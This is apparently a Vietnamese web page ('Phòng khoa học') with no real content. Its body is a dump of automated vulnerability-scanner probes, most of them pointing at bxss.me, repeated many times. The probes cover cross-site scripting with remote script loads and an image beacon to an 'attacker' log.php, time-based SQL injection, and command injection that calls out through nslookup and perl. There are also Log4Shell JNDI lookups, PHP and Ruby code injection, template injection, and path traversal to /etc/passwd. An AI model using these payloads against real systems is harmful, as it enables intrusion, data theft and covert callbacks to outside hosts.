Phòng khoa học

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9699'>

1<isindex type=image src=1 onerror=cKwK(9607)>

1<svg �onload=cKwK(9616);>

1<ScRiPt >cKwK(9776)</ScRiPt>

1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9440></ScRiPt>

1<ScRiPt >cKwK(9909)</ScRiPt>

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%63%4B%77%4B%28%39%36%37%31%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

1<script>cKwK(9901)</script>

1<WSYL9R>PDGXI[!+!]</WSYL9R>

1<ScRiPt >cKwK(9722)</ScRiPt>

"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

acx${98991*97996}::.x

acx[[${98991*97996}]]xca

acx{{98991*97996}}xca

1 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

1 <th:t="${acx}#foreach

1 <%={{={@{#{${acx}}%>

acux8794%C0%BEz1%C0%BCz2a%90bcxuca8794

acu9829%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca9829

@@kIHUV

1��%2527%2522

1'"

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

CkYSBN2l')) OR 650=(SELECT 650 FROM PG_SLEEP(15))--

oX2qDGWd') OR 806=(SELECT 806 FROM PG_SLEEP(15))--

s0TIfKlE' OR 941=(SELECT 941 FROM PG_SLEEP(15))--

-1)) OR 218=(SELECT 218 FROM PG_SLEEP(15))--

-5) OR 592=(SELECT 592 FROM PG_SLEEP(15))--

-5 OR 606=(SELECT 606 FROM PG_SLEEP(15))--

mYAG5jZH')); waitfor delay '0:0:15' --

2eSBbNI0'); waitfor delay '0:0:15' --

19013242

4vwyTSEg'; waitfor delay '0:0:15' --

1 waitfor delay '0:0:15' --

-1)); waitfor delay '0:0:15' --

-1); waitfor delay '0:0:15' --

-1; waitfor delay '0:0:15' --

(select(0)from(select(sleep(15)))v)/'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"/

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

if(now()=sysdate(),sleep(15),0)

-1" OR 2+640-640-1=0+0+0+1 --

-1' OR 2+577-577-1=0+0+0+1 or 'LVIKIg23'='

-1' OR 2+941-941-1=0+0+0+1 --

-1 OR 2+646-646-1=0+0+0+1

-1 OR 2+523-523-1=0+0+0+1 --

HwEqFK4X

1 ;(nslookup hitxtkygzlkqvb6340.bxss.me||perl -e "gethostbyname('hitxtkygzlkqvb6340.bxss.me')")|(nslookup hitxtkygzlkqvb6340.bxss.me||perl -e "gethostbyname('hitxtkygzlkqvb6340.bxss.me')")&(nslookup hitxtkygzlkqvb6340.bxss.me||perl -e "gethostbyname('hitxtkygzlkqvb6340.bxss.me')")

`(nslookup hitupauklpntl618ad.bxss.me||perl -e "gethostbyname('hitupauklpntl618ad.bxss.me')")`

|(nslookup hitwujftrmwgl5488c.bxss.me||perl -e "gethostbyname('hitwujftrmwgl5488c.bxss.me')")

&(nslookup hitakxpvrxbfmb3088.bxss.me||perl -e "gethostbyname('hitakxpvrxbfmb3088.bxss.me')")&'\"`0&(nslookup hitakxpvrxbfmb3088.bxss.me||perl -e "gethostbyname('hitakxpvrxbfmb3088.bxss.me')")&`'

$(nslookup hitfxragjfthga71bb.bxss.me||perl -e "gethostbyname('hitfxragjfthga71bb.bxss.me')")

(nslookup hittgijmylolkb4761.bxss.me||perl -e "gethostbyname('hittgijmylolkb4761.bxss.me')")

1 |echo ghsreu$()\ pxoaib\nz^xyu||a #' |echo ghsreu$()\ pxoaib\nz^xyu||a #|" |echo ghsreu$()\ pxoaib\nz^xyu||a #

&echo fdqcky$()\ bzuwld\nz^xyu||a #' &echo fdqcky$()\ bzuwld\nz^xyu||a #|" &echo fdqcky$()\ bzuwld\nz^xyu||a #

'"()&%<acx><ScRiPt >cKwK(9059)</ScRiPt>

echo aokdwg$()\ jfenoi\nz^xyu||a #' &echo aokdwg$()\ jfenoi\nz^xyu||a #|" &echo aokdwg$()\ jfenoi\nz^xyu||a #

1 1'"()&%<acx><ScRiPt >cKwK(9034)</ScRiPt>

1 '+'A'.concat(70-3).concat(22*4).concat(111).concat(74).concat(109).concat(83)+(require'socket' Socket.gethostbyname('hitff'+'uwgardgd9c1ba.bxss.me.')[3].to_s)+'

1 bxss.me/t/xss.html?%00

HttP://bxss.me/t/xss.html?%00

"+"A".concat(70-3).concat(22*4).concat(119).concat(65).concat(116).concat(66)+(require"socket" Socket.gethostbyname("hitya"+"qosgjyiz2d71f.bxss.me.")[3].to_s)+"

1 ^(#$!@#$)(()))******

!(()&&!|||

)

1 '.print(md5(31337)).'

${@print(md5(31337))}\

${@print(md5(31337))}

1 1&n997509=v957197

";print(md5(31337));$a="

';print(md5(31337));$a='

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

1 ".gethostbyname(lc("hitkx"."bvgnzptg26085.bxss.me."))."A".chr(67).chr(hex("58")).chr(97).chr(83).chr(119).chr(78)."

'.gethostbyname(lc('hitjc'.'plzuqroq5683d.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(102).chr(85).chr(97).chr(71).'

1 bxss.me

http://bxss.me/t/fit.txt%3F.jpg

Http://bxss.me/t/fit.txt

1some_inexistent_file_with_long_name%00.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

1 )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1 ../1

1 ../../../../../../../../../../../../../../windows/win.ini

1 ../../../../../../../../../../../../../../etc/passwd

1 /xfs.bxss.me

1 3IOasCKB

1 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

1 '"()

1 <!--

'"

${9999599+9999660}

1 "+response.write(9697534*9731490)+"

1 '+response.write(9697534*9731490)+'

response.write(9697534*9731490)

1 ${j${::-n}di:dns${::-:}//hitczpfokaotvc97aa${::-.}bxss.me}

1 1<esi:include src="http://bxss.me/rpb.png"/>

/../../../../../../../../../../windows/system32/BITSADMIN.exe

1 1<aECCsDQ<

1<img sRc='http://attacker-9112/log.php?

1<aTkvST8 x=9274>

1<ifRAme sRc=9249.com></IfRamE>

1<WOP9UP>IVW5O[!+!]</WOP9UP>

17ucpG <ScRiPt >0fH0(9925)</ScRiPt>

1}body{acu:Expre/**/SSion(0fH0(9429))}

<a HrEF=jaVaScRiPT:>

<a HrEF=http://xss.bxss.me></a>

1<input autofocus onfocus=0fH0(9027)>

�<img acu onmouseover=0fH0(99001) //�>

1<ScRiPt>0fH0(9342)</sCripT>

1\u003CScRiPt\0fH0(9512)\u003C/sCripT\u003E

%31%3C%53%63%52%69%50%74%20%3E%30%66%48%30%289775%29%3C%2F%73%43%72%69%70%54%3E

1<img/src=">" onerror=alert(9491)>

1<img src=xyz OnErRor=0fH0(9167)>

1<img src=//xss.bxss.me/t/dot.gif onload=0fH0(9627)>

1<body onload=0fH0(9718)>

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9858'>

1<isindex type=image src=1 onerror=0fH0(9932)>

1<svg �onload=0fH0(9085);>

1<ScRiPt >0fH0(9788)</ScRiPt>

1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9303></ScRiPt>

1<ScRiPt >0fH0(9886)</ScRiPt>

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%30%66%48%30%28%39%38%34%30%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

1<script>0fH0(9458)</script>

1<WMGVTU>C6Y5H[!+!]</WMGVTU>

1<ScRiPt >0fH0(9799)</ScRiPt>

"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

acx${98991*97996}::.x

acx[[${98991*97996}]]xca

acx{{98991*97996}}xca

1 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

1 <th:t="${acx}#foreach

1 <%={{={@{#{${acx}}%>

acux2825%C0%BEz1%C0%BCz2a%90bcxuca2825

acu2143%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca2143

19037557

'"()&%<acx><ScRiPt >0fH0(9250)</ScRiPt>

1'"()&%<acx><ScRiPt >0fH0(9135)</ScRiPt>

1<aEeuctm<

1<img sRc='http://attacker-9602/log.php?

1<aI829sd x=9236>

1<ifRAme sRc=9119.com></IfRamE>

1<WFPCYH>E5ANY[!+!]</WFPCYH>

1s4Dra <ScRiPt >fmKp(9489)</ScRiPt>

1}body{acu:Expre/**/SSion(fmKp(9895))}

<a HrEF=jaVaScRiPT:>

<a HrEF=http://xss.bxss.me></a>

1<input autofocus onfocus=fmKp(9215)>

�<img acu onmouseover=fmKp(90181) //�>

1<ScRiPt>fmKp(9820)</sCripT>

1\u003CScRiPt\fmKp(9427)\u003C/sCripT\u003E

%31%3C%53%63%52%69%50%74%20%3E%66%6D%4B%70%289027%29%3C%2F%73%43%72%69%70%54%3E

1<img/src=">" onerror=alert(9475)>

1<img src=xyz OnErRor=fmKp(9425)>

1<img src=//xss.bxss.me/t/dot.gif onload=fmKp(9677)>

1<body onload=fmKp(9598)>

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9998'>

1<isindex type=image src=1 onerror=fmKp(9018)>

1<svg �onload=fmKp(9289);>

1<ScRiPt >fmKp(9098)</ScRiPt>

1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9232></ScRiPt>

1<ScRiPt >fmKp(9652)</ScRiPt>

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%66%6D%4B%70%28%39%37%30%30%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

1<script>fmKp(9888)</script>

1<WFQNWF>SPW29[!+!]</WFQNWF>

1<ScRiPt >fmKp(9976)</ScRiPt>

"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

acx${98991*97996}::.x

acx[[${98991*97996}]]xca

acx{{98991*97996}}xca

1 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

1 <th:t="${acx}#foreach

1 <%={{={@{#{${acx}}%>

acux4940%C0%BEz1%C0%BCz2a%90bcxuca4940

acu3039%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca3039

19623614

'"()&%<acx><ScRiPt >fmKp(9101)</ScRiPt>

1'"()&%<acx><ScRiPt >fmKp(9736)</ScRiPt>

1<atPj4NL<

1<img sRc='http://attacker-9063/log.php?

1<arKh5Gd x=9161>

1<ifRAme sRc=9651.com></IfRamE>

1<WDTMNY>KUETR[!+!]</WDTMNY>

1h5Fpd <ScRiPt >dhkD(9109)</ScRiPt>

1}body{acu:Expre/**/SSion(dhkD(9131))}

<a HrEF=jaVaScRiPT:>

<a HrEF=http://xss.bxss.me></a>

1<input autofocus onfocus=dhkD(9095)>

�<img acu onmouseover=dhkD(94521) //�>

1<ScRiPt>dhkD(9115)</sCripT>

1\u003CScRiPt\dhkD(9002)\u003C/sCripT\u003E

%31%3C%53%63%52%69%50%74%20%3E%64%68%6B%44%289187%29%3C%2F%73%43%72%69%70%54%3E

1<img/src=">" onerror=alert(9642)>

1<img src=xyz OnErRor=dhkD(9830)>

1<img src=//xss.bxss.me/t/dot.gif onload=dhkD(9151)>

1<body onload=dhkD(9950)>

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9117'>

1<isindex type=image src=1 onerror=dhkD(9375)>

1<svg �onload=dhkD(9191);>

1<ScRiPt >dhkD(9974)</ScRiPt>

1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9031></ScRiPt>

1<ScRiPt >dhkD(9889)</ScRiPt>

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%64%68%6B%44%28%39%35%39%33%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

1<script>dhkD(9275)</script>

1<WTQVWE>WWGOK[!+!]</WTQVWE>

1<ScRiPt >dhkD(9879)</ScRiPt>

"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

acx${98991*97996}::.x

acx[[${98991*97996}]]xca

acx{{98991*97996}}xca

1 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

1 <th:t="${acx}#foreach

1 <%={{={@{#{${acx}}%>

acux3326%C0%BEz1%C0%BCz2a%90bcxuca3326

acu3437%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca3437

19534672

'"()&%<acx><ScRiPt >dhkD(9571)</ScRiPt>

1'"()&%<acx><ScRiPt >dhkD(9356)</ScRiPt>

1<ajdZat1<

1<img sRc='http://attacker-9250/log.php?

1<aujKsup x=9198>

1<ifRAme sRc=9376.com></IfRamE>

1<WDXKPZ>VLWED[!+!]</WDXKPZ>

1X1oa3 <ScRiPt >MKnm(9052)</ScRiPt>

1}body{acu:Expre/**/SSion(MKnm(9463))}

<a HrEF=jaVaScRiPT:>

<a HrEF=http://xss.bxss.me></a>

1<input autofocus onfocus=MKnm(9517)>

�<img acu onmouseover=MKnm(98001) //�>

1<ScRiPt>MKnm(9802)</sCripT>

1\u003CScRiPt\MKnm(9772)\u003C/sCripT\u003E

%31%3C%53%63%52%69%50%74%20%3E%4D%4B%6E%6D%289345%29%3C%2F%73%43%72%69%70%54%3E

1<img/src=">" onerror=alert(9250)>

1<img src=xyz OnErRor=MKnm(9787)>

1<img src=//xss.bxss.me/t/dot.gif onload=MKnm(9546)>

1<body onload=MKnm(9652)>

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9196'>

1<isindex type=image src=1 onerror=MKnm(9200)>

1<svg �onload=MKnm(9053);>

1<ScRiPt >MKnm(9825)</ScRiPt>

1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9082></ScRiPt>

1<ScRiPt >MKnm(9649)</ScRiPt>

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%4D%4B%6E%6D%28%39%30%31%35%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

1<script>MKnm(9366)</script>

1<WX8GXU>CKF0Q[!+!]</WX8GXU>

1<ScRiPt >MKnm(9140)</ScRiPt>

"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

acx${98991*97996}::.x

acx[[${98991*97996}]]xca

acx{{98991*97996}}xca

1 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

1 <th:t="${acx}#foreach

1 <%={{={@{#{${acx}}%>

acux10274%C0%BEz1%C0%BCz2a%90bcxuca10274

acu4263%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca4263

19582430

'"()&%<acx><ScRiPt >MKnm(9463)</ScRiPt>

1'"()&%<acx><ScRiPt >MKnm(9438)</ScRiPt>

1<aCTRj8j<

1<img sRc='http://attacker-9805/log.php?

1<a6wCNg4 x=9599>

1<ifRAme sRc=9789.com></IfRamE>

1<WCXWWC>FBYLC[!+!]</WCXWWC>

1iHtDw <ScRiPt >XGtH(9971)</ScRiPt>

1}body{acu:Expre/**/SSion(XGtH(9210))}

<a HrEF=jaVaScRiPT:>

<a HrEF=http://xss.bxss.me></a>

1<input autofocus onfocus=XGtH(9315)>

�<img acu onmouseover=XGtH(94641) //�>

1<ScRiPt>XGtH(9771)</sCripT>

1\u003CScRiPt\XGtH(9938)\u003C/sCripT\u003E

%31%3C%53%63%52%69%50%74%20%3E%58%47%74%48%289219%29%3C%2F%73%43%72%69%70%54%3E

1<img/src=">" onerror=alert(9740)>

1<img src=xyz OnErRor=XGtH(9667)>

1<img src=//xss.bxss.me/t/dot.gif onload=XGtH(9543)>

1<body onload=XGtH(9383)>

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9923'>

1<isindex type=image src=1 onerror=XGtH(9269)>

1<svg �onload=XGtH(9449);>

1<ScRiPt >XGtH(9429)</ScRiPt>

1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9375></ScRiPt>

1<ScRiPt >XGtH(9491)</ScRiPt>

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%58%47%74%48%28%39%39%31%34%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

1<script>XGtH(9417)</script>

1<WMABTH>SU1U2[!+!]</WMABTH>

1<ScRiPt >XGtH(9969)</ScRiPt>

"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

acx${98991*97996}::.x

acx[[${98991*97996}]]xca

acx{{98991*97996}}xca

1 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

1 <th:t="${acx}#foreach

@@3edfJ

1��%2527%2522

1'"

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

S1TnLb3a')) OR 633=(SELECT 633 FROM PG_SLEEP(15))--

rGwSUi9w') OR 666=(SELECT 666 FROM PG_SLEEP(15))--

gmyXgSAZ' OR 621=(SELECT 621 FROM PG_SLEEP(15))--

1 <%={{={@{#{${acx}}%>

-1)) OR 50=(SELECT 50 FROM PG_SLEEP(15))--

-5) OR 952=(SELECT 952 FROM PG_SLEEP(15))--

-5 OR 261=(SELECT 261 FROM PG_SLEEP(15))--

BpaKosxG')); waitfor delay '0:0:15' --

IusGhooG'); waitfor delay '0:0:15' --

VSLueeeG'; waitfor delay '0:0:15' --

1 waitfor delay '0:0:15' --

-1)); waitfor delay '0:0:15' --

-1); waitfor delay '0:0:15' --

-1; waitfor delay '0:0:15' --

(select(0)from(select(sleep(15)))v)/'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"/

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

if(now()=sysdate(),sleep(15),0)

-1" OR 2+272-272-1=0+0+0+1 --

-1' OR 2+824-824-1=0+0+0+1 or 'jrLioIAp'='

-1' OR 2+95-95-1=0+0+0+1 --

-1 OR 2+859-859-1=0+0+0+1

-1 OR 2+493-493-1=0+0+0+1 --

i96K8nsr

1 acux8315%C0%BEz1%C0%BCz2a%90bcxuca8315

1 ${j${::-n}di:dns${::-:}//hitaemyntnkpdaa915${::-.}bxss.me}

1 acu10457%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca10457

1 ".gethostbyname(lc("hitdn"."xzpsvtql0c8ff.bxss.me."))."A".chr(67).chr(hex("58")).chr(112).chr(74).chr(119).chr(68)."

'.gethostbyname(lc('hitkw'.'yuxwvxhg2cbb0.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(100).chr(71).chr(112).chr(79).'

1 19388240

'"()&%<acx><ScRiPt >XGtH(9065)</ScRiPt>

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1 1'"()&%<acx><ScRiPt >XGtH(9356)</ScRiPt>

1<esi:include src="http://bxss.me/rpb.png"/>

1 <!--

'"

/xfs.bxss.me

1 ;(nslookup hitvtciehxyhs4a2c7.bxss.me||perl -e "gethostbyname('hitvtciehxyhs4a2c7.bxss.me')")|(nslookup hitvtciehxyhs4a2c7.bxss.me||perl -e "gethostbyname('hitvtciehxyhs4a2c7.bxss.me')")&(nslookup hitvtciehxyhs4a2c7.bxss.me||perl -e "gethostbyname('hitvtciehxyhs4a2c7.bxss.me')")

`(nslookup hitwbijpjokky5a71f.bxss.me||perl -e "gethostbyname('hitwbijpjokky5a71f.bxss.me')")`

|(nslookup hitsqrfhftowf9423e.bxss.me||perl -e "gethostbyname('hitsqrfhftowf9423e.bxss.me')")

&(nslookup hithwloblyueq8fce0.bxss.me||perl -e "gethostbyname('hithwloblyueq8fce0.bxss.me')")&'\"`0&(nslookup hithwloblyueq8fce0.bxss.me||perl -e "gethostbyname('hithwloblyueq8fce0.bxss.me')")&`'

$(nslookup hitudiwbsimgxd8b73.bxss.me||perl -e "gethostbyname('hitudiwbsimgxd8b73.bxss.me')")

(nslookup hittduqbcdzmfd0e16.bxss.me||perl -e "gethostbyname('hittduqbcdzmfd0e16.bxss.me')")

|echo egcltx$()\ uzjtdm\nz^xyu||a #' |echo egcltx$()\ uzjtdm\nz^xyu||a #|" |echo egcltx$()\ uzjtdm\nz^xyu||a #

&echo gmcjik$()\ wkwfar\nz^xyu||a #' &echo gmcjik$()\ wkwfar\nz^xyu||a #|" &echo gmcjik$()\ wkwfar\nz^xyu||a #

echo awazeq$()\ gxlizb\nz^xyu||a #' &echo awazeq$()\ gxlizb\nz^xyu||a #|" &echo awazeq$()\ gxlizb\nz^xyu||a #

1 1&n990910=v938889

1 "+response.write(9075657*9889280)+"

'+response.write(9075657*9889280)+'

response.write(9075657*9889280)

1 ^(#$!@#$)(()))******

!(()&&!|||

)

1 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

1 '.print(md5(31337)).'

${@print(md5(31337))}\

'+'A'.concat(70-3).concat(22*4).concat(102).concat(88).concat(100).concat(84)+(require'socket' Socket.gethostbyname('hitaa'+'zzgvhcjp36022.bxss.me.')[3].to_s)+'

"+"A".concat(70-3).concat(22*4).concat(114).concat(77).concat(100).concat(90)+(require"socket" Socket.gethostbyname("hitio"+"wrthvblu5ba61.bxss.me.")[3].to_s)+"

1 ${@print(md5(31337))}

1 ../1

1 ";print(md5(31337));$a="

../../../../../../../../../../../../../../windows/win.ini

../../../../../../../../../../../../../../etc/passwd

/../../../../../../../../../../windows/system32/BITSADMIN.exe

'"()

1 ';print(md5(31337));$a='

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

1 bxss.me

1 http://bxss.me/t/fit.txt%3F.jpg

Http://bxss.me/t/fit.txt

1some_inexistent_file_with_long_name%00.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

1 FAB1rPQM

1 ${9999408+10000146}

1 bxss.me/t/xss.html?%00

HttP://bxss.me/t/xss.html?%00

1 1<abgIpCb<

1<img sRc='http://attacker-9794/log.php?

1<akPkkNk x=9204>

1<ifRAme sRc=9362.com></IfRamE>

1<WE3C4A>YNCNY[!+!]</WE3C4A>

1JfGJ5 <ScRiPt >sMCw(9759)</ScRiPt>

1}body{acu:Expre/**/SSion(sMCw(9757))}

<a HrEF=jaVaScRiPT:>

<a HrEF=http://xss.bxss.me></a>

1<input autofocus onfocus=sMCw(9511)>

�<img acu onmouseover=sMCw(97651) //�>

1<ScRiPt>sMCw(9451)</sCripT>

1\u003CScRiPt\sMCw(9612)\u003C/sCripT\u003E

%31%3C%53%63%52%69%50%74%20%3E%73%4D%43%77%289658%29%3C%2F%73%43%72%69%70%54%3E

1<img/src=">" onerror=alert(9021)>

1<img src=xyz OnErRor=sMCw(9431)>

1<img src=//xss.bxss.me/t/dot.gif onload=sMCw(9893)>

1<body onload=sMCw(9738)>

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9070'>

1<isindex type=image src=1 onerror=sMCw(9325)>

1<svg �onload=sMCw(9485);>

1<ScRiPt >sMCw(9948)</ScRiPt>

1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9050></ScRiPt>

1<ScRiPt >sMCw(9097)</ScRiPt>

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%73%4D%43%77%28%39%30%31%37%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

1<script>sMCw(9854)</script>

1 1<WQNXMB>FWFNN[!+!]</WQNXMB>

@@pfHD7

1��%2527%2522

1 1'"

1 @@TV77Z

1��%2527%2522

1'"

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

XPIU89tU')) OR 603=(SELECT 603 FROM PG_SLEEP(15))--

PCecFSjM')) OR 31=(SELECT 31 FROM PG_SLEEP(15))--

MZACZyFP') OR 89=(SELECT 89 FROM PG_SLEEP(15))--

fhgcFp1t') OR 612=(SELECT 612 FROM PG_SLEEP(15))--

Jmn7HeWT' OR 202=(SELECT 202 FROM PG_SLEEP(15))--

9vGzJZMa' OR 918=(SELECT 918 FROM PG_SLEEP(15))--

-1)) OR 521=(SELECT 521 FROM PG_SLEEP(15))--

-1)) OR 15=(SELECT 15 FROM PG_SLEEP(15))--

-5) OR 106=(SELECT 106 FROM PG_SLEEP(15))--

-5) OR 854=(SELECT 854 FROM PG_SLEEP(15))--

-5 OR 218=(SELECT 218 FROM PG_SLEEP(15))--

-5 OR 899=(SELECT 899 FROM PG_SLEEP(15))--

1<ScRiPt >sMCw(9009)</ScRiPt>

"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

acx${98991*97996}::.x

acx[[${98991*97996}]]xca

acx{{98991*97996}}xca

1<aV6gjsm<

1<img sRc='http://attacker-9141/log.php?

1 7UALoPd9')); waitfor delay '0:0:15' --

jjDGH6DP')); waitfor delay '0:0:15' --

9QEWQhzW'); waitfor delay '0:0:15' --

YC4xIcQX'); waitfor delay '0:0:15' --

BEK6uolO'; waitfor delay '0:0:15' --

BBysEyLV'; waitfor delay '0:0:15' --

1 waitfor delay '0:0:15' --

1<a4wAPMr x=9341>

1 waitfor delay '0:0:15' --

-1)); waitfor delay '0:0:15' --

-1); waitfor delay '0:0:15' --

-1; waitfor delay '0:0:15' --

(select(0)from(select(sleep(15)))v)/'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"/

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1<ifRAme sRc=9972.com></IfRamE>

1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

if(now()=sysdate(),sleep(15),0)

1 -1" OR 2+728-728-1=0+0+0+1 --

-1' OR 2+467-467-1=0+0+0+1 or 'lRuFHlGT'='

-1' OR 2+588-588-1=0+0+0+1 --

1<WQXASB>NZO7D[!+!]</WQXASB>

<th:t="${acx}#foreach

-1 OR 2+993-993-1=0+0+0+1

-1 OR 2+338-338-1=0+0+0+1 --

1zXWCA <ScRiPt >7Lyc(9909)</ScRiPt>

u3tkbwgL

1 <%={{={@{#{${acx}}%>

-1" OR 2+212-212-1=0+0+0+1 --

-1' OR 2+665-665-1=0+0+0+1 or 'woW59gg4'='

-1' OR 2+628-628-1=0+0+0+1 --

-1 OR 2+821-821-1=0+0+0+1

acux1557%C0%BEz1%C0%BCz2a%90bcxuca1557

-1 OR 2+442-442-1=0+0+0+1 --

5PjUeK3Q

1 1}body{acu:Expre/**/SSion(7Lyc(9920))}

1 acu9147%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca9147

1 <a HrEF=jaVaScRiPT:>

<a HrEF=http://xss.bxss.me></a>

1<input autofocus onfocus=7Lyc(9989)>

�<img acu onmouseover=7Lyc(96111) //�>

1 1<ScRiPt>7Lyc(9342)</sCripT>

1 1\u003CScRiPt\7Lyc(9649)\u003C/sCripT\u003E

1 %31%3C%53%63%52%69%50%74%20%3E%37%4C%79%63%289407%29%3C%2F%73%43%72%69%70%54%3E

19537724

1<img/src=">" onerror=alert(9485)>

1 1<img src=xyz OnErRor=7Lyc(9922)>

1<img src=//xss.bxss.me/t/dot.gif onload=7Lyc(9345)>

'"()&%<acx><ScRiPt >sMCw(9292)</ScRiPt>

1 1<body onload=7Lyc(9009)>

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9859'>

1<isindex type=image src=1 onerror=7Lyc(9314)>

"+response.write(9786675*9221999)+"

1 1<svg �onload=7Lyc(9889);>

'"()

../1

1 ../../../../../../../../../../../../../../windows/win.ini

../../../../../../../../../../../../../../etc/passwd

1<ScRiPt >7Lyc(9947)</ScRiPt>

^(#$!@#$)(()))******

;(nslookup hituasgasecei82748.bxss.me||perl -e "gethostbyname('hituasgasecei82748.bxss.me')")|(nslookup hituasgasecei82748.bxss.me||perl -e "gethostbyname('hituasgasecei82748.bxss.me')")&(nslookup hituasgasecei82748.bxss.me||perl -e "gethostbyname('hituasgasecei82748.bxss.me')")

`(nslookup hitvpesorwlrpb5a7d.bxss.me||perl -e "gethostbyname('hitvpesorwlrpb5a7d.bxss.me')")`

|(nslookup hitqmetwprsloe479c.bxss.me||perl -e "gethostbyname('hitqmetwprsloe479c.bxss.me')")

&(nslookup hitzgegclrndm63a09.bxss.me||perl -e "gethostbyname('hitzgegclrndm63a09.bxss.me')")&'\"`0&(nslookup hitzgegclrndm63a09.bxss.me||perl -e "gethostbyname('hitzgegclrndm63a09.bxss.me')")&`'

$(nslookup hitbjaitvqxel8848e.bxss.me||perl -e "gethostbyname('hitbjaitvqxel8848e.bxss.me')")

